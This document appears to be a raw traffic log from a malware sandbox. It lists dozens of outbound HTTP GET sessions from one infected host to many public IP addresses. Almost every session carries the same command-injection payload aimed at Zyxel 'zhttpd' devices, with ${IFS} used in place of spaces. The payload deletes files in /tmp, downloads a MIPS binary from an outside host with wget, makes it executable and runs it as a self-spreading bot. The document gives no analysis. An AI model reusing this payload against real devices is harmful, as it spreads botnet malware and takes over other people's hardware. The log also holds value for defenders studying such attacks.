                                                        Jan 28, 2024 10:13:07.698647022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8257192.168.2.143618236.139.254.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698653936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8258192.168.2.144593473.15.142.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698683977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8259192.168.2.14578768.181.252.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698736906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8260192.168.2.1439436112.108.19.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698762894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8261192.168.2.1454610107.48.181.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698816061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8262192.168.2.1441176164.227.157.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698848009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8263192.168.2.143367013.234.63.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698883057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8264192.168.2.1435756150.189.6.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698937893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8265192.168.2.144544859.177.110.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.698972940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8266192.168.2.1447018177.165.106.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699007988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8267192.168.2.1442170139.114.35.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699053049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8268192.168.2.1455640184.65.210.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699067116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8269192.168.2.1458958180.3.149.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699127913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8270192.168.2.144253853.240.170.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699151993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8271192.168.2.145416876.84.197.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699203014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8272192.168.2.1442314111.190.20.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699229956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8273192.168.2.144920840.30.98.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699266911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8274192.168.2.143710048.75.234.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699281931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8275192.168.2.1459336157.51.107.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699321985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8276192.168.2.143339681.230.83.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699361086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8277192.168.2.1432936178.69.172.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699410915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8278192.168.2.145862225.44.21.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699450016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8279192.168.2.14555602.108.181.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699470997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8280192.168.2.1448326115.221.13.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699518919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8281192.168.2.1451852139.94.33.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699549913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8282192.168.2.14577949.12.96.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699573994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8283192.168.2.1441650110.89.51.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699625969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8284192.168.2.144867012.167.197.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699649096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8285192.168.2.1457762183.7.79.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699697018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8286192.168.2.1440788195.135.233.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699721098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8287192.168.2.143848497.37.50.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699779034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8288192.168.2.1453168124.46.92.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699815035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8289192.168.2.1436132120.199.97.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699848890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8290192.168.2.143486498.176.189.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699879885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8291192.168.2.1435916166.209.191.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699920893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8292192.168.2.143414889.111.105.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.699961901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8293192.168.2.14360141.104.119.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.700001001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8294192.168.2.1452904146.247.211.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.700057983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8295192.168.2.1454218183.164.254.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.700083971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8296192.168.2.1436000221.247.109.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.700124025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8297192.168.2.1446514105.87.176.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.700164080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8298192.168.2.1433668203.176.157.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.700205088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8299192.168.2.1448402132.60.211.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.700234890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8300192.168.2.1454208138.106.105.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.700272083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8301192.168.2.145386639.123.40.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.700303078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8302192.168.2.1448714168.201.149.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.700350046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8303192.168.2.1433890168.152.182.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.700412989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8304192.168.2.1453936185.179.123.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.700428009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8305192.168.2.145008093.55.131.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.700484991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8306192.168.2.1444062113.239.237.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.703197956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8307192.168.2.143444267.107.159.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.703701973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8308192.168.2.1454900148.235.120.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.703725100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8309192.168.2.144916227.163.101.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.703752995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8310192.168.2.1456142164.169.239.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.703807116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8311192.168.2.1433162140.87.140.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.703833103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8312192.168.2.144843069.238.144.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.703869104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8313192.168.2.143976017.32.225.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.703915119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8314192.168.2.145832259.183.86.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.703958988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8315192.168.2.143879627.71.244.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.703989029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8316192.168.2.1453910178.18.104.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.704016924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8317192.168.2.144999495.50.155.168443
                                                        TimestampBytes transferredDirectionData
